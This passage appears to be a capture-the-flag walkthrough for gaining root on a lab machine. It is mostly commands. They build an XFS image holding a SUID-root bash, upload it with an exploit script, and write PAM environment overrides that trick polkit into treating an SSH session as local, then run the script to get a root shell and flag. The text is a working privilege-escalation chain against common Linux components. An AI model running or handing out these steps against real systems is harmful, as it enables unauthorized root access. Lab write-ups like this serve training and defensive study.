# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# Verify (should show 300M)
ls -lh xfs.image# Upload exploit script and image
scp exp.sh abc@10.129.252.9:~/
scp xfs.image abc@10.129.252.9:~/# SSH login to target
ssh phileasfogg3@10.129.252.9
# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
# Verify configuration
cat ~/.pam_environment
# 🔥 Critical: Logout (to activate PAM config)
exit# Re-login via SSH (PAM config now active)
ssh phileasfogg3@10.129.252.9
# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# Execute privilege escalation script
bash exp.shIf exploitation succeeds, you should see:
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!
════════════════════════════════════════════════════════════
║ ROOT FLAG ║
║ <flag_here> ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
| Issue | Solution |
|---|---|
CanReboot returns ('no',) |
Make sure you logged out and back in (Step 3) |
Not authorized error |
Check ~/.pam_environment content is correct |
| SUID bash not found | Re-upload xfs.image and verify SUID bit is set |
- ✅ Must logout and re-login: PAM config only takes effect in new sessions
- ✅ Verify CanReboot: Confirm it returns
('yes',)before running script - ✅ Use SSH login: Don't use
ssh -t user@host "cmd"style execution
If it fails, ensure every step is executed strictly in order!